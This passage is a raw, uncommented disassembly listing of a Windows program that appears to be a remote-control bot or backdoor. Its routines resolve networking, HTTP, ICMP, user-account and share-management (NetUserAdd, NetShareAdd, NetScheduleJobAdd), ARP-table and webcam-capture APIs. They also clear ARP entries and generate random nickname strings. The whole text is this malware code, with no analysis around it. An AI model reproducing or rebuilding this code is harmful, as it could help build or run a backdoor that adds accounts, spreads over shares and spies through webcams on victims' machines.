call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_4CB9FC, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_4CBA68, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_4CB9B4, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_4CB978, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_4CB9E8, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_4CBA58, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_4CB98C, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_4CB928, eax
call esi ; GetProcAddress
cmp dword_4CB944, ebx
mov dword_4CBA6C, eax
jz loc_40A0DE
cmp dword_4CBA78, ebx
jz loc_40A0DE
cmp dword_4CB8E4, ebx
jz loc_40A0DE
cmp dword_4CB980, ebx
jz loc_40A0DE
cmp dword_4CB968, ebx
jz loc_40A0DE
cmp dword_4CB92C, ebx
jz loc_40A0DE
cmp dword_4CBA54, ebx
jz loc_40A0DE
cmp dword_4CBA70, ebx
jz loc_40A0DE
cmp dword_4CB97C, ebx
jz loc_40A0DE
cmp dword_4CBA60, ebx
jz loc_40A0DE
cmp dword_4CBA14, ebx
jz loc_40A0DE
cmp dword_4CB9D4, ebx
jz loc_40A0DE
cmp dword_4CB9D0, ebx
jz loc_40A0DE
cmp dword_4CB904, ebx
jz short loc_40A0DE
cmp dword_4CBA24, ebx
jz short loc_40A0DE
cmp dword_4CBA38, ebx
jz short loc_40A0DE
cmp dword_4CB9EC, ebx
jz short loc_40A0DE
cmp dword_4CB9AC, ebx
jz short loc_40A0DE
cmp dword_4CBA00, ebx
jz short loc_40A0DE
cmp dword_4CB9BC, ebx
jz short loc_40A0DE
cmp dword_4CB9FC, ebx
jz short loc_40A0DE
cmp dword_4CBA68, ebx
jz short loc_40A0DE
cmp dword_4CB9B4, ebx
jz short loc_40A0DE
cmp dword_4CB978, ebx
jz short loc_40A0DE
cmp dword_4CB9E8, ebx
jz short loc_40A0DE
cmp dword_4CBA58, ebx
jz short loc_40A0DE
cmp dword_4CB98C, ebx
jz short loc_40A0DE
cmp eax, ebx
jnz short loc_40A0E8
jmp short loc_40A0DE
; ---------------------------------------------------------------------------
loc_40A0D3: ; CODE XREF: sub_409909+51F�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAB8, eax
loc_40A0DE: ; CODE XREF: sub_409909+6BE�j
; sub_409909+6CA�j ...
mov dword_4CBAB4, 1
loc_40A0E8: ; CODE XREF: sub_409909+7C6�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A1ED
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_4CB910, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_4CB898, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_4CB99C, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_4CB948, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_4CB9A8, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_4CB96C, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_4CB8D8, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_4CB8D0, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_4CB8E0, eax
call esi ; GetProcAddress
cmp dword_4CB910, ebx
mov ecx, dword_4CB96C
mov dword_4CBA08, eax
jz short loc_40A1C9
cmp dword_4CB898, ebx
jz short loc_40A1C9
cmp dword_4CB99C, ebx
jz short loc_40A1C9
cmp dword_4CB948, ebx
jz short loc_40A1C9
cmp dword_4CB9A8, ebx
jz short loc_40A1C9
cmp ecx, ebx
jz short loc_40A1C9
cmp dword_4CB8D8, ebx
jz short loc_40A1C9
cmp dword_4CB8D0, ebx
jz short loc_40A1C9
cmp dword_4CB8E0, ebx
jz short loc_40A1C9
cmp eax, ebx
jnz short loc_40A1D3
loc_40A1C9: ; CODE XREF: sub_409909+87E�j
; sub_409909+886�j ...
mov dword_4CBABC, 1
loc_40A1D3: ; CODE XREF: sub_409909+8BE�j
cmp ecx, ebx
jz short loc_40A208
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_4CB984, eax
jnz short loc_40A208
jmp short loc_40A202
; ---------------------------------------------------------------------------
loc_40A1ED: ; CODE XREF: sub_409909+7EA�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAC0, eax
mov dword_4CBABC, 1
loc_40A202: ; CODE XREF: sub_409909+8E2�j
mov dword_4CB984, ebx
loc_40A208: ; CODE XREF: sub_409909+8CC�j
; sub_409909+8E0�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A252
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_4CB95C, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_4CBA8C, eax
call esi ; GetProcAddress
cmp dword_4CB95C, ebx
mov dword_4CB8EC, eax
jz short loc_40A25D
cmp dword_4CBA8C, ebx
jz short loc_40A25D
cmp eax, ebx
jnz short loc_40A267
jmp short loc_40A25D
; ---------------------------------------------------------------------------
loc_40A252: ; CODE XREF: sub_409909+90A�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAC8, eax
loc_40A25D: ; CODE XREF: sub_409909+939�j
; sub_409909+941�j ...
mov dword_4CBAC4, 1
loc_40A267: ; CODE XREF: sub_409909+945�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A36E
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_4CB8C8, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_4CB8A0, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_4CB918, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_4CB94C, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_4CBA64, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_4CB900, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_4CB8AC, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_4CB89C, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_4CB934, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_4CBA2C, eax
call esi ; GetProcAddress
push offset aNetwkstagetinf ; "NetWkstaGetInfo"
push edi
mov dword_4CB9E4, eax
call esi ; GetProcAddress
cmp dword_4CB8C8, ebx
mov dword_4CB908, eax
jz short loc_40A379
cmp dword_4CB8A0, ebx
jz short loc_40A379
cmp dword_4CB918, ebx
jz short loc_40A379
cmp dword_4CB94C, ebx
jz short loc_40A379
cmp dword_4CBA64, ebx
jz short loc_40A379
cmp dword_4CB900, ebx
jz short loc_40A379
cmp dword_4CB8AC, ebx
jz short loc_40A379
cmp dword_4CB89C, ebx
jz short loc_40A379
cmp dword_4CB934, ebx
jz short loc_40A379
cmp dword_4CBA2C, ebx
jz short loc_40A379
cmp dword_4CB9E4, ebx
jnz short loc_40A383
jmp short loc_40A379
; ---------------------------------------------------------------------------
loc_40A36E: ; CODE XREF: sub_409909+969�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAD0, eax
loc_40A379: ; CODE XREF: sub_409909+A11�j
; sub_409909+A19�j ...
mov dword_4CBACC, 1
loc_40A383: ; CODE XREF: sub_409909+A61�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A3B8
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_4CB8F0, eax
call esi ; GetProcAddress
cmp dword_4CB8F0, ebx
mov dword_4CB9CC, eax
jz short loc_40A3C3
cmp eax, ebx
jnz short loc_40A3CD
jmp short loc_40A3C3
; ---------------------------------------------------------------------------
loc_40A3B8: ; CODE XREF: sub_409909+A85�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAD8, eax
loc_40A3C3: ; CODE XREF: sub_409909+AA7�j
; sub_409909+AAD�j
mov dword_4CBAD4, 1
loc_40A3CD: ; CODE XREF: sub_409909+AAB�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A402
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_4CBA50, eax
call esi ; GetProcAddress
cmp dword_4CBA50, ebx
mov dword_4CBA4C, eax
jz short loc_40A40D
cmp eax, ebx
jnz short loc_40A417
jmp short loc_40A40D
; ---------------------------------------------------------------------------
loc_40A402: ; CODE XREF: sub_409909+ACF�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAE0, eax
loc_40A40D: ; CODE XREF: sub_409909+AF1�j
; sub_409909+AF7�j
mov dword_4CBADC, 1
loc_40A417: ; CODE XREF: sub_409909+AF5�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A476
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_4CBA7C, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_4CBA74, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_4CBA3C, eax
call esi ; GetProcAddress
cmp dword_4CBA7C, ebx
mov dword_4CB90C, eax
jz short loc_40A481
cmp dword_4CBA74, ebx
jz short loc_40A481
cmp dword_4CBA3C, ebx
jz short loc_40A481
cmp eax, ebx
jnz short loc_40A48B
jmp short loc_40A481
; ---------------------------------------------------------------------------
loc_40A476: ; CODE XREF: sub_409909+B19�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAE8, eax
loc_40A481: ; CODE XREF: sub_409909+B55�j
; sub_409909+B5D�j ...
mov dword_4CBAE4, 1
loc_40A48B: ; CODE XREF: sub_409909+B69�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A4C0
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_4CB940, eax
call esi ; GetProcAddress
cmp dword_4CB940, ebx
mov dword_4CBA48, eax
jz short loc_40A4CB
cmp eax, ebx
jnz short loc_40A4D5
jmp short loc_40A4CB
; ---------------------------------------------------------------------------
loc_40A4C0: ; CODE XREF: sub_409909+B8D�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAF0, eax
loc_40A4CB: ; CODE XREF: sub_409909+BAF�j
; sub_409909+BB5�j
mov dword_4CBAEC, 1
loc_40A4D5: ; CODE XREF: sub_409909+BB3�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A55E
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_4CBA10, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_4CBA5C, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_4CB998, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_4CB950, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_4CB9F0, eax
call esi ; GetProcAddress
cmp dword_4CBA10, ebx
mov dword_4CB960, eax
jz short loc_40A569
cmp dword_4CBA5C, ebx
jz short loc_40A569
cmp dword_4CB998, ebx
jz short loc_40A569
cmp dword_4CB950, ebx
jz short loc_40A569
cmp dword_4CB9F0, ebx
jz short loc_40A569
cmp eax, ebx
jnz short loc_40A573
jmp short loc_40A569
; ---------------------------------------------------------------------------
loc_40A55E: ; CODE XREF: sub_409909+BD7�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAF8, eax
loc_40A569: ; CODE XREF: sub_409909+C2D�j
; sub_409909+C35�j ...
mov dword_4CBAF4, 1
loc_40A573: ; CODE XREF: sub_409909+C51�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A5A8
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov dword_4CB924, eax
call esi ; GetProcAddress
cmp dword_4CB924, ebx
mov dword_4CBA04, eax
jz short loc_40A5B3
cmp eax, ebx
jnz short loc_40A5BD
jmp short loc_40A5B3
; ---------------------------------------------------------------------------
loc_40A5A8: ; CODE XREF: sub_409909+C75�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBB00, eax
loc_40A5B3: ; CODE XREF: sub_409909+C97�j
; sub_409909+C9D�j
mov dword_4CBAFC, 1
loc_40A5BD: ; CODE XREF: sub_409909+C9B�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_409909 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40A5C5(int,char *Str,int,int)
sub_40A5C5 proc near ; CODE XREF: sub_401ACD+2511�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+Str]
push esi
xor esi, esi
cmp dword_4CBA94, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40A60D
push dword_4CBA98
lea eax, [ebp+Dest]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A60D: ; CODE XREF: sub_40A5C5+1A�j
cmp dword_4CBA9C, esi
jz short loc_40A641
push dword_4CBAA0
lea eax, [ebp+Dest]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A641: ; CODE XREF: sub_40A5C5+4E�j
cmp dword_4CBAA4, esi
jz short loc_40A675
push dword_4CBAA8
lea eax, [ebp+Dest]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A675: ; CODE XREF: sub_40A5C5+82�j
cmp dword_4CBAAC, esi
jz short loc_40A6A9
push dword_4CBAB0
lea eax, [ebp+Dest]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A6A9: ; CODE XREF: sub_40A5C5+B6�j
cmp dword_4CBAB4, esi
jz short loc_40A6DD
push dword_4CBAB8
lea eax, [ebp+Dest]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A6DD: ; CODE XREF: sub_40A5C5+EA�j
cmp dword_4CBABC, esi
jz short loc_40A711
push dword_4CBAC0
lea eax, [ebp+Dest]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A711: ; CODE XREF: sub_40A5C5+11E�j
cmp dword_4CBAC4, esi
jz short loc_40A745
push dword_4CBAC8
lea eax, [ebp+Dest]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A745: ; CODE XREF: sub_40A5C5+152�j
cmp dword_4CBACC, esi
jz short loc_40A779
push dword_4CBAD0
lea eax, [ebp+Dest]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A779: ; CODE XREF: sub_40A5C5+186�j
cmp dword_4CBAD4, esi
jz short loc_40A7AD
push dword_4CBAD8
lea eax, [ebp+Dest]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A7AD: ; CODE XREF: sub_40A5C5+1BA�j
cmp dword_4CBADC, esi
jz short loc_40A7E1
push dword_4CBAE0
lea eax, [ebp+Dest]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A7E1: ; CODE XREF: sub_40A5C5+1EE�j
cmp dword_4CBAE4, esi
jz short loc_40A815
push dword_4CBAE8
lea eax, [ebp+Dest]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A815: ; CODE XREF: sub_40A5C5+222�j
cmp dword_4CBAEC, esi
jz short loc_40A849
push dword_4CBAF0
lea eax, [ebp+Dest]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A849: ; CODE XREF: sub_40A5C5+256�j
cmp dword_4CBAF4, esi
jz short loc_40A87D
push dword_4CBAF8
lea eax, [ebp+Dest]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A87D: ; CODE XREF: sub_40A5C5+28A�j
cmp dword_4CBAFC, esi
jz short loc_40A8B1
push dword_4CBB00
lea eax, [ebp+Dest]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax ; Dest
loc_40A897: ; DATA XREF: .data:0043320C�o
; .data:00433250�o ...
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
loc_40A8B1: ; CODE XREF: sub_40A5C5+2BE�j
lea eax, [ebp+Dest]
push offset asc_42D6C4 ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40A8DE
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_40A8DE: ; CODE XREF: sub_40A5C5+302�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40A5C5 endp
; =============== S U B R O U T I N E =======================================
sub_40A8F0 proc near ; CODE XREF: sub_4017ED+4F�p
; sub_401ACD+5BC5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40A918
push [esp+arg_0]
call dword_4CBA58 ; gethostbyname
test eax, eax
jnz short loc_40A911
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40A911: ; CODE XREF: sub_40A8F0+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40A918: ; CODE XREF: sub_40A8F0+D�j
retn
sub_40A8F0 endp
; =============== S U B R O U T I N E =======================================
sub_40A919 proc near ; CODE XREF: sub_4017ED+D6�p
mov ecx, dword_4CB8F0
xor eax, eax
test ecx, ecx
jz short locret_40A927
call ecx ; DnsFlushResolverCache
locret_40A927: ; CODE XREF: sub_40A919+A�j
retn
sub_40A919 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A928 proc near ; CODE XREF: sub_401ACD:loc_403F03�p
Dest = byte ptr -88h
Size = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+Size]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+Size], edi
mov [ebp+var_4], ebx
call dword_4CBA50 ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_40A9EE
sub ecx, 32h
jz loc_40A9E7
sub ecx, 48h
jz short loc_40A988
sub ecx, 6Eh
jz short loc_40A981
loc_40A96A: ; CODE XREF: sub_40A928+8B�j
push eax
lea eax, [ebp+Dest]
push offset asc_42D8D8 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40A9C8
; ---------------------------------------------------------------------------
loc_40A981: ; CODE XREF: sub_40A928+40�j
push offset unk_42D8B4
jmp short loc_40A9BA
; ---------------------------------------------------------------------------
loc_40A988: ; CODE XREF: sub_40A928+3B�j
push [ebp+Size] ; Size
call _malloc
push [ebp+Size] ; Size
mov esi, eax
push edi ; Val
push esi ; Dst
call _memset
add esp, 10h
cmp esi, edi
jz short loc_40A9B5
lea eax, [ebp+Size]
push ebx
push eax
push esi
call dword_4CBA50 ; GetIpNetTable
cmp eax, edi
jz short loc_40A9EE
jmp short loc_40A96A
; ---------------------------------------------------------------------------
loc_40A9B5: ; CODE XREF: sub_40A928+79�j
push offset asc_42D884 ; "-"
loc_40A9BA: ; CODE XREF: sub_40A928+5E�j
; sub_40A928+C4�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40A9C8: ; CODE XREF: sub_40A928+57�j
lea eax, [ebp+Dest]
mov [ebp+var_4], edi
push eax
call sub_415D38
pop ecx
loc_40A9D8: ; CODE XREF: sub_40A928+C8�j
; sub_40A928+DC�j
push esi
call sub_41BA91
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40A9E7: ; CODE XREF: sub_40A928+32�j
push offset unk_42D854
jmp short loc_40A9BA
; ---------------------------------------------------------------------------
loc_40A9EE: ; CODE XREF: sub_40A928+29�j
; sub_40A928+89�j
cmp [esi], edi
jbe short loc_40A9D8
lea ebx, [esi+4]
loc_40A9F5: ; CODE XREF: sub_40A928+DA�j
push ebx
call dword_4CBA4C ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40A9F5
jmp short loc_40A9D8
sub_40A928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA06 proc near ; CODE XREF: sub_401ACD+21ED�p
; sub_401ACD+233E�p ...
Dst = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4CB978 ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset byte_4CBB04
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi ; Dest
call _sprintf
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AA06 endp
; =============== S U B R O U T I N E =======================================
sub_40AA5F proc near ; CODE XREF: sub_413694+24C�p
; sub_413694+292�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_40AA88
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_40AA7B: ; CODE XREF: sub_40AA5F+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_40AA7B
pop edi
jmp short loc_40AA8C
; ---------------------------------------------------------------------------
loc_40AA88: ; CODE XREF: sub_40AA5F+A�j
mov edx, [esp+4+arg_0]
loc_40AA8C: ; CODE XREF: sub_40AA5F+27�j
test esi, esi
pop esi
jz short loc_40AA96
movzx ecx, byte ptr [edx]
add eax, ecx
loc_40AA96: ; CODE XREF: sub_40AA5F+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40AA5F endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40AAAC(char *Dest)
sub_40AAAC proc near ; CODE XREF: sub_40AE84+49�p
; DATA XREF: .data:off_42D920�o
Dest = dword ptr 4
push esi
push edi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call _rand
xor edx, edx
mov ecx, 48Fh
div ecx
mov edi, [esp+8+Dest]
push off_42D99C[edx*4]
push offset aS_6 ; "%s"
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40AB14
loc_40AAEE: ; CODE XREF: sub_40AAAC+66�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40AAEE
loc_40AB14: ; CODE XREF: sub_40AAAC+40�j
mov eax, edi
pop edi
pop esi
retn
sub_40AAAC endp
; ---------------------------------------------------------------------------
push esi
push edi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
mov edi, [esp+10h]
mov dword ptr [esp], offset asc_429138 ; "-"
push offset aS_6 ; "%s"
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40AB72
loc_40AB4C: ; CODE XREF: .text:0040AB70�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40AB4C
loc_40AB72: ; CODE XREF: .text:0040AB4A�j
mov eax, edi
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_40AB77 proc near ; CODE XREF: sub_401ACD+68EE�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call _rand
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, dword_429098
test esi, esi
jle short loc_40ABBA
loc_40ABA4: ; CODE XREF: sub_40AB77+41�j
call _rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40ABA4
loc_40ABBA: ; CODE XREF: sub_40AB77+2B�j
